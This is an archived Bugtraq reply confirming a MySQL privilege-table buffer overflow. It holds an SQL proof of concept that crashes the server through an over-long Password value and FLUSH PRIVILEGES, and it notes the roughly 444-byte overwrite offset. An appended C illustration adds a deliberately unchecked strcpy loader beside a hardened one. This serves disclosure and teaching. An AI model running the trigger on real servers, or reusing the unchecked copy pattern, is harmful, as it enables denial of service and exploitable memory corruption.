Bugtraq mailing list archives

Re: Buffer overflow in MySQL


From: Konstantin Tsolov <ktsolov () etel bg>
Date: Thu, 11 Sep 2003 13:41:29 +0300


Managed to replicate on 4.0.13 (custom made) running on slack8.1 with
mysql.mysql.

3.23.51 (the distro mysql version) also proved vulnerable.

NB: just make sure you have a backup copy of your mysql db when testing this
harmless proof of concept on your production server :-)

Successful exploitation of that bug is trivial on some platforms. On most
Linux systems the return address needs about 444 bytes to get overwritten.

  Harmless proof of concept:
  > USE mysql;
  > ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
  > UPDATE User SET Password =

'123456781234567812345678123456781234567812345678123456781234567812345678
 123456781234567812345678123456781234567812345678123456781234567812345678
 123456781234567812345678123456781234567812345678123456781234567812345678
 12345678123456781234567812345678...' WHERE User = 'abcd';

  > FLUSH PRIVILEGES;

  [Connection lost]

-- 

"Talk is cheap because supply always exceeds demand."
                -- source unknown

+------------------------------------------------------+
| Konstantin Tsolov             ktsolov at etel dot bg |
| Systems Administrator - VoIP                         |
| eTel Ltd.                                www.etel.bg |
| Sofia, Bulgaria                                      |
+------------------------------------------------------+
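The post shows the trigger (widen the Password column, store an over-long value, FLUSH PRIVILEGES) but not the copy that goes wrong. The following C is an added illustration, not code from the post or from MySQL: it models the pattern the report describes, a fixed-size ACL buffer filled from a column whose width the server trusts, next to a hardened loader that validates the value before copying. The 16-hex-digit hash length, the struct layout, the buffer sizes and the sample hash string are assumptions made for the example, not facts about MySQL's source.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>

/* Assumption for this illustration: the old (pre-4.1) MySQL hash is 16 hex
   characters, and the in-memory ACL cache keeps it in a fixed-size buffer
   sized for that column. None of this is copied from MySQL's code. */
#define OLD_HASH_LEN 16

struct acl_user {
    char user[17];
    char password[OLD_HASH_LEN + 1];
};

/* Vulnerable pattern (modelled, not MySQL's actual code): the loader trusts
   the declared column width and copies without a bound, so a value stored
   after ALTER ... LONGTEXT runs past the buffer during FLUSH PRIVILEGES. */
void load_password_unchecked(struct acl_user *u, const char *value) {
    strcpy(u->password, value);
}

/* Hardened form: accept only an empty hash (no password set) or exactly
   OLD_HASH_LEN hex digits, then copy a known length. Returns 0 on success,
   -1 if the value is rejected. */
int load_password_checked(struct acl_user *u, const char *value) {
    size_t n = strlen(value);
    if (n != 0 && n != OLD_HASH_LEN) return -1;
    for (size_t i = 0; i < n; i++)
        if (!isxdigit((unsigned char)value[i])) return -1;
    memcpy(u->password, value, n);
    u->password[n] = '\0';
    return 0;
}

/* Build the post's "12345678..." pattern of a given length (constructed
   input mirroring the proof of concept). Caller frees the result. */
char *make_poc_value(size_t len) {
    static const char pat[] = "12345678";
    char *s = malloc(len + 1);
    if (!s) return NULL;
    for (size_t i = 0; i < len; i++) s[i] = pat[i % 8];
    s[len] = '\0';
    return s;
}

/* Would this value overrun the fixed buffer under the unchecked copy?
   strlen plus the terminating NUL must fit in the destination. */
int would_overflow(const char *value) {
    return strlen(value) + 1 > sizeof(((struct acl_user *)0)->password);
}

int main(void) {
    struct acl_user u;
    char *poc = make_poc_value(444);   /* the length the post cites for Linux */
    if (!poc) return 1;
    printf("poc length %zu, would overflow unchecked buffer: %d\n",
           strlen(poc), would_overflow(poc));
    printf("checked load of poc value: %d\n", load_password_checked(&u, poc));
    /* "5d2e19393cc5ef67" is a constructed 16-hex-digit string, not a real hash */
    printf("checked load of well-formed hash: %d\n",
           load_password_checked(&u, "5d2e19393cc5ef67"));
    free(poc);
    return 0;
}
```

The unchecked loader is present only to show the shape of the bug; the program never calls it with the long value, because doing so is exactly the crash the post reports. The hardened loader rejects the 444-byte value before any copy happens, so the same UPDATE followed by FLUSH PRIVILEGES would log a bad row instead of losing the connection.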

